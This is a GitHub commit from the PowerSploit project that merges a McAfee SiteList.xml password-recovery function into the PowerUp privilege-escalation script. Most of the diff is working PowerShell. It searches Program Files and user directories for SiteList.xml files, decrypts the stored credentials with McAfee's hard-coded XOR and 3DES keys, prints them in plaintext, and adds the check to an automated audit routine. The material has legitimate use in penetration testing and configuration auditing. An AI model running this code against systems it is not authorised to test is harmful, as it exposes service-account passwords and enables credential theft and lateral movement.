Combined Get-SiteListPassword.ps1 into PowerUp.ps1

PowerShellMafia · May 23, 2016 · 83305c5 · 83305c5
1 parent c30c682
commit 83305c5
Show file tree

Hide file tree

Showing 3 changed files with 189 additions and 179 deletions.
diff --git a/Privesc/Get-SiteListPassword.ps1 b/Privesc/Get-SiteListPassword.ps1
diff --git a/Privesc/PowerUp.ps1 b/Privesc/PowerUp.ps1
@@ -205,6 +205,7 @@ function Test-ServiceDaclPermission {
     return $False
 }
 
+
 function Invoke-ServiceStart {
 <#
     .SYNOPSIS
@@ -2105,6 +2106,186 @@ function Get-ApplicationHost {
 }
 
 
+function Get-SiteListPassword {
+<#
+    .SYNOPSIS
+
+        Retrieves the plaintext passwords for found McAfee's SiteList.xml files.
+        Based on Jerome Nokin (@funoverip)'s Python solution (in links).
+
+        PowerSploit Function: Get-SiteListPassword
+        Original Author: Jerome Nokin (@funoverip)
+        PowerShell Port: @harmj0y
+        License: BSD 3-Clause
+        Required Dependencies: None
+        Optional Dependencies: None
+
+    .PARAMETER SiteListFilePath
+
+        Optional path to a SiteList.xml file.
+
+    .EXAMPLE
+    
+        PS C:\> Get-SiteListPassword
+
+        EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
+        UserName    :
+        Path        : Products/CommonUpdater
+        Name        : McAfeeHttp
+        DecPassword : MyStrongPassword!
+        Enabled     : 1
+        DomainName  :
+        Server      : update.nai.com:80
+
+        EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
+        UserName    : McAfeeService
+        Path        : Repository$
+        Name        : Paris
+        DecPassword : MyStrongPassword!
+        Enabled     : 1
+        DomainName  : companydomain
+        Server      : paris001
+
+        EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
+        UserName    : McAfeeService
+        Path        : Repository$
+        Name        : Tokyo
+        DecPassword : MyStrongPassword!
+        Enabled     : 1
+        DomainName  : companydomain
+        Server      : tokyo000
+
+    .LINK
+        https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
+        https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
+        https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
+#>
+
+    [CmdletBinding()]
+    param(
+        [ValidateScript({Test-Path -Path $_ })]
+        [String]
+        $SiteListFilePath
+    )
+
+    function Get-DecryptedSitelistPassword {
+        # PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
+        # Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com)
+        # port by @harmj0y
+        [CmdletBinding()]
+        Param (
+            [Parameter(Mandatory = $True)]
+            [String]
+            $B64Pass
+        )
+
+        # make sure the appropriate assemblies are loaded
+        Add-Type -assembly System.Security
+        Add-Type -assembly System.Core
+
+        # declare the encoding/crypto providers we need
+        $Encoding = [System.Text.Encoding]::ASCII
+        $SHA1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider 
+        $3DES = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider
+
+        # static McAfee key XOR key LOL
+        $XORKey = 0x12,0x15,0x0F,0x10,0x11,0x1C,0x1A,0x06,0x0A,0x1F,0x1B,0x18,0x17,0x16,0x05,0x19
+
+        # xor the input b64 string with the static XOR key
+        $I = 0;
+        $UnXored = [System.Convert]::FromBase64String($B64Pass) | Foreach-Object { $_ -BXor $XORKey[$I++ % $XORKey.Length] }
+
+        # build the static McAfee 3DES key TROLOL
+        $3DESKey = $SHA1.ComputeHash($Encoding.GetBytes('<!@#$%^>')) + ,0x00*4
+
+        # set the options we need
+        $3DES.Mode = 'ECB'
+        $3DES.Padding = 'None'
+        $3DES.Key = $3DESKey
+
+        # decrypt the unXor'ed block
+        $Decrypted = $3DES.CreateDecryptor().TransformFinalBlock($UnXored, 0, $UnXored.Length)
+
+        # ignore the padding for the result
+        $Index = [Array]::IndexOf($Decrypted, [Byte]0)
+        if($Index -ne -1) {
+            $DecryptedPass = $Encoding.GetString($Decrypted[0..($Index-1)])
+        }
+        else {
+            $DecryptedPass = $Encoding.GetString($Decrypted)
+        }
+
+        New-Object -TypeName PSObject -Property @{'Encrypted'=$B64Pass;'Decrypted'=$DecryptedPass}
+    }
+
+    function Get-SitelistFields {
+        [CmdletBinding()]
+        Param (
+            [Parameter(Mandatory = $True)]
+            [String]
+            $Path
+        )
+
+        try {
+            [Xml]$SiteListXml = Get-Content -Path $Path
+
+            if($SiteListXml.InnerXml -Like "*password*") {
+                Write-Verbose "Potential password in found in $Path"
+
+                $SiteListXml.SiteLists.SiteList.ChildNodes | Foreach-Object {                    
+                    try {
+                        $PasswordRaw = $_.Password.'#Text'
+
+                        if($_.Password.Encrypted -eq 1) {
+                            # decrypt the base64 password if it's marked as encrypted
+                            $DecPassword = if($PasswordRaw) { (Get-DecryptedSitelistPassword -B64Pass $PasswordRaw).Decrypted } else {''}
+                        }
+                        else {
+                            $DecPassword = $PasswordRaw
+                        }
+
+                        $Server = if($_.ServerIP) { $_.ServerIP } else { $_.Server }
+                        $Path = if($_.ShareName) { $_.ShareName } else { $_.RelativePath }
+
+                        $ObjectProperties = @{
+                            'Name' = $_.Name;
+                            'Enabled' = $_.Enabled;
+                            'Server' = $Server;
+                            'Path' = $Path;
+                            'DomainName' = $_.DomainName;
+                            'UserName' = $_.UserName;
+                            'EncPassword' = $PasswordRaw;
+                            'DecPassword' = $DecPassword;
+                        }
+                        New-Object -TypeName PSObject -Property $ObjectProperties
+                    }
+                    catch {
+                        Write-Debug "Error parsing node : $_"
+                    }
+                }
+            }
+        }
+        catch {
+            Write-Error $_
+        }
+    }
+
+    if($SiteListFilePath) {
+        $XmlFiles = Get-ChildItem -Path $SiteListFilePath
+    }
+    else {
+        $XmlFiles = 'C:\Program Files\','C:\Program Files (x86)\','C:\Documents and Settings\','C:\Users\' | Foreach-Object {
+            Get-ChildItem -Path $_ -Recurse -Include 'SiteList.xml' -ErrorAction SilentlyContinue
+        }
+    }
+
+    $XmlFiles | Where-Object { $_ } | Foreach-Object {
+        Write-Verbose "Parsing SiteList.xml file '$($_.Fullname)'"
+        Get-SitelistFields -Path $_.Fullname        
+    }
+}
+
+
 function Write-UserAddMSI {
 <#
     .SYNOPSIS
@@ -2296,6 +2477,13 @@ function Invoke-AllChecks {
     if($HTMLReport) {
         $Results | ConvertTo-HTML -Head $Header -Body "<H2>Encrypted Application Pool Passwords</H2>" | Out-File -Append $HtmlReportFile
     }
+
+    "`n`n[*] Checking for plaintext passwords in McAfee SiteList.xml files...."
+    $Results = Get-SiteListPassword | Where-Object {$_}
+    $Results | Format-List
+    if($HTMLReport) {
+        $Results | ConvertTo-HTML -Head $Header -Body "<H2>McAfee's SiteList.xml's</H2>" | Out-File -Append $HtmlReportFile
+    }
     "`n"
 
     if($HTMLReport) {

diff --git a/Privesc/Privesc.psd1 b/Privesc/Privesc.psd1
@@ -48,7 +48,7 @@ FunctionsToExport = @(
 )
 
 # List of all files packaged with this module
-FileList = 'Privesc.psm1', 'Get-SiteListPassword.ps1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md'
+FileList = 'Privesc.psm1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md'
 
 }